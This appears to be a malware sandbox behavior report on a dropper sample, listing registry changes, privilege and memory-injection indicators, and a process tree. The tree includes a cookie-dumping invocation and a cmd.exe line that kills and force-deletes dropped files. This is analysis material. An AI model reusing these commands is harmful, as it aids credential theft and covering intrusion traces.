Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e6329cde2733d701	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{62FM2EJ3-714D-A09D-WM25-6QFJ226I1FER}\1 = "22"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{F961600B-A42E-433A-B2B9-FC0E6F3D1352} = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 51a319d02733d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListInPrivateBrowsingAllowed = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000d0e3d4bb52339b04d210f0c565142aa59035427b064e57c5af90efcabd24d0f39854a2dcf9008086dc47da6f7aeb12dabb50ca5463891564051e	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	guihuali-game.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 1d24df8b702cd701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 62ed76d52733d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2800	rundll32.exe
2800	rundll32.exe
1920	svchost.exe
1920	svchost.exe
4584	jfiag3g_gg.exe
4584	jfiag3g_gg.exe
3020	RunWW.exe
3020	RunWW.exe
3020	RunWW.exe
3020	RunWW.exe
3020	RunWW.exe
3020	RunWW.exe
3020	RunWW.exe
3020	RunWW.exe
3888	prolab.tmp
3888	prolab.tmp
2296	2520276.exe
2296	2520276.exe
1280	7503414.exe
1280	7503414.exe
1280	7503414.exe
2296	2520276.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe
1816	Kudyhuvaqae.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
5596	MicrosoftEdgeCP.exe
5596	MicrosoftEdgeCP.exe
5596	MicrosoftEdgeCP.exe
2152	toolspab1.exe
2160	cmd.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
4256	Windows Host.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3108	Three.exe
Token: SeDebugPrivilege	3656	JoSetp.exe
Token: SeDebugPrivilege	928	BarSetpFile.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeTcbPrivilege	1920	svchost.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	4392	7945204.exe
Token: SeDebugPrivilege	4352	1706868.exe
Token: SeDebugPrivilege	2296	2520276.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	1280	7503414.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeDebugPrivilege	2800	rundll32.exe
Token: SeAssignPrimaryTokenPrivilege	2620	svchost.exe
Token: SeIncreaseQuotaPrivilege	2620	svchost.exe
Token: SeSecurityPrivilege	2620	svchost.exe
Token: SeTakeOwnershipPrivilege	2620	svchost.exe
Token: SeLoadDriverPrivilege	2620	svchost.exe
Token: SeSystemtimePrivilege	2620	svchost.exe
Token: SeBackupPrivilege	2620	svchost.exe
Token: SeRestorePrivilege	2620	svchost.exe
Token: SeShutdownPrivilege	2620	svchost.exe
Token: SeSystemEnvironmentPrivilege	2620	svchost.exe
Token: SeUndockPrivilege	2620	svchost.exe
Token: SeManageVolumePrivilege	2620	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2620	svchost.exe
Token: SeIncreaseQuotaPrivilege	2620	svchost.exe
Token: SeSecurityPrivilege	2620	svchost.exe
Token: SeTakeOwnershipPrivilege	2620	svchost.exe
Token: SeLoadDriverPrivilege	2620	svchost.exe
Token: SeSystemtimePrivilege	2620	svchost.exe
Token: SeBackupPrivilege	2620	svchost.exe
Token: SeRestorePrivilege	2620	svchost.exe
Token: SeShutdownPrivilege	2620	svchost.exe
Token: SeSystemEnvironmentPrivilege	2620	svchost.exe
Token: SeUndockPrivilege	2620	svchost.exe
Token: SeManageVolumePrivilege	2620	svchost.exe
Token: SeDebugPrivilege	2260	alpATCHInO.exe
Token: SeDebugPrivilege	4188	ysAGEL.exe
Token: SeAssignPrimaryTokenPrivilege	2620	svchost.exe
Token: SeIncreaseQuotaPrivilege	2620	svchost.exe
Token: SeSecurityPrivilege	2620	svchost.exe
Token: SeTakeOwnershipPrivilege	2620	svchost.exe
Token: SeLoadDriverPrivilege	2620	svchost.exe
Token: SeSystemtimePrivilege	2620	svchost.exe
Token: SeBackupPrivilege	2620	svchost.exe
Token: SeRestorePrivilege	2620	svchost.exe
Token: SeShutdownPrivilege	2620	svchost.exe
Token: SeSystemEnvironmentPrivilege	2620	svchost.exe
Token: SeUndockPrivilege	2620	svchost.exe
Token: SeManageVolumePrivilege	2620	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2620	svchost.exe
Token: SeIncreaseQuotaPrivilege	2620	svchost.exe
Token: SeSecurityPrivilege	2620	svchost.exe
Token: SeTakeOwnershipPrivilege	2620	svchost.exe
Token: SeLoadDriverPrivilege	2620	svchost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3888	prolab.tmp

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
5656	MicrosoftEdge.exe
5596	MicrosoftEdgeCP.exe
5596	MicrosoftEdgeCP.exe
2892	google-game.exe
2892	google-game.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3920 wrote to memory of 2640	3920	55CB4375683875666481DC417B20B757.exe	75
PID 3920 wrote to memory of 2640	3920	55CB4375683875666481DC417B20B757.exe	75
PID 3920 wrote to memory of 2640	3920	55CB4375683875666481DC417B20B757.exe	75
PID 3920 wrote to memory of 3020	3920	55CB4375683875666481DC417B20B757.exe	76
PID 3920 wrote to memory of 3020	3920	55CB4375683875666481DC417B20B757.exe	76
PID 3920 wrote to memory of 3020	3920	55CB4375683875666481DC417B20B757.exe	76
PID 3920 wrote to memory of 3776	3920	55CB4375683875666481DC417B20B757.exe	77
PID 3920 wrote to memory of 3776	3920	55CB4375683875666481DC417B20B757.exe	77
PID 3920 wrote to memory of 3776	3920	55CB4375683875666481DC417B20B757.exe	77
PID 3920 wrote to memory of 2812	3920	55CB4375683875666481DC417B20B757.exe	84
PID 3920 wrote to memory of 2812	3920	55CB4375683875666481DC417B20B757.exe	84
PID 3920 wrote to memory of 2812	3920	55CB4375683875666481DC417B20B757.exe	84
PID 3920 wrote to memory of 3108	3920	55CB4375683875666481DC417B20B757.exe	78
PID 3920 wrote to memory of 3108	3920	55CB4375683875666481DC417B20B757.exe	78
PID 3920 wrote to memory of 3964	3920	55CB4375683875666481DC417B20B757.exe	79
PID 3920 wrote to memory of 3964	3920	55CB4375683875666481DC417B20B757.exe	79
PID 3920 wrote to memory of 3964	3920	55CB4375683875666481DC417B20B757.exe	79
PID 3920 wrote to memory of 208	3920	55CB4375683875666481DC417B20B757.exe	80
PID 3920 wrote to memory of 208	3920	55CB4375683875666481DC417B20B757.exe	80
PID 3920 wrote to memory of 208	3920	55CB4375683875666481DC417B20B757.exe	80
PID 3920 wrote to memory of 3656	3920	55CB4375683875666481DC417B20B757.exe	81
PID 3920 wrote to memory of 3656	3920	55CB4375683875666481DC417B20B757.exe	81
PID 3964 wrote to memory of 1956	3964	LabPicV3.exe	83
PID 3964 wrote to memory of 1956	3964	LabPicV3.exe	83
PID 3964 wrote to memory of 1956	3964	LabPicV3.exe	83
PID 3920 wrote to memory of 928	3920	55CB4375683875666481DC417B20B757.exe	82
PID 3920 wrote to memory of 928	3920	55CB4375683875666481DC417B20B757.exe	82
PID 3920 wrote to memory of 1496	3920	55CB4375683875666481DC417B20B757.exe	85
PID 3920 wrote to memory of 1496	3920	55CB4375683875666481DC417B20B757.exe	85
PID 3920 wrote to memory of 1496	3920	55CB4375683875666481DC417B20B757.exe	85
PID 208 wrote to memory of 716	208	lylal220.exe	86
PID 208 wrote to memory of 716	208	lylal220.exe	86
PID 208 wrote to memory of 716	208	lylal220.exe	86
PID 2812 wrote to memory of 988	2812	guihuali-game.exe	87
PID 2812 wrote to memory of 988	2812	guihuali-game.exe	87
PID 2812 wrote to memory of 988	2812	guihuali-game.exe	87
PID 2640 wrote to memory of 2328	2640	hjjgaa.exe	88
PID 2640 wrote to memory of 2328	2640	hjjgaa.exe	88
PID 2640 wrote to memory of 2328	2640	hjjgaa.exe	88
PID 988 wrote to memory of 2800	988	WScript.exe	92
PID 988 wrote to memory of 2800	988	WScript.exe	92
PID 988 wrote to memory of 2800	988	WScript.exe	92
PID 928 wrote to memory of 2296	928	BarSetpFile.exe	90
PID 928 wrote to memory of 2296	928	BarSetpFile.exe	90
PID 928 wrote to memory of 2296	928	BarSetpFile.exe	90
PID 3656 wrote to memory of 1280	3656	JoSetp.exe	91
PID 3656 wrote to memory of 1280	3656	JoSetp.exe	91
PID 3656 wrote to memory of 1280	3656	JoSetp.exe	91
PID 3656 wrote to memory of 2444	3656	JoSetp.exe	97
PID 3656 wrote to memory of 2444	3656	JoSetp.exe	97
PID 3656 wrote to memory of 2444	3656	JoSetp.exe	97
PID 928 wrote to memory of 388	928	BarSetpFile.exe	94
PID 928 wrote to memory of 388	928	BarSetpFile.exe	94
PID 928 wrote to memory of 388	928	BarSetpFile.exe	94
PID 1956 wrote to memory of 2260	1956	LabPicV3.tmp	93
PID 1956 wrote to memory of 2260	1956	LabPicV3.tmp	93
PID 2800 wrote to memory of 1920	2800	rundll32.exe	70
PID 716 wrote to memory of 4188	716	lylal220.tmp	95
PID 716 wrote to memory of 4188	716	lylal220.tmp	95
PID 2800 wrote to memory of 2852	2800	rundll32.exe	19
PID 1920 wrote to memory of 4236	1920	svchost.exe	96
PID 1920 wrote to memory of 4236	1920	svchost.exe	96
PID 1920 wrote to memory of 4236	1920	svchost.exe	96
PID 2800 wrote to memory of 1000	2800	rundll32.exe	56

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2620

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2852

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2628

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2424

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2416

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1844

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1412

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1252

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1232

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1080

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:860

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1000

C:\Users\Admin\AppData\Local\Temp\55CB4375683875666481DC417B20B757.exe
"C:\Users\Admin\AppData\Local\Temp\55CB4375683875666481DC417B20B757.exe"
1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3920
- C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe
  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2640
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    - Executes dropped EXE
    PID:2328
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:4584
- C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe
  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:3020
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
    3⤵
    PID:5080
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im RunWW.exe /f
      4⤵
      Kills process with taskkill
      PID:4268
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 6
      4⤵
      Delays execution with timeout.exe
      PID:4592
- C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe
  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\jg7_7wjg.exe"
  2⤵
  - Executes dropped EXE
  PID:3776
- C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe
  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3108
- C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe
  "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3964
- - C:\Users\Admin\AppData\Local\Temp\is-SGRAQ.tmp\LabPicV3.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-SGRAQ.tmp\LabPicV3.tmp" /SL5="$10206,136934,53248,C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
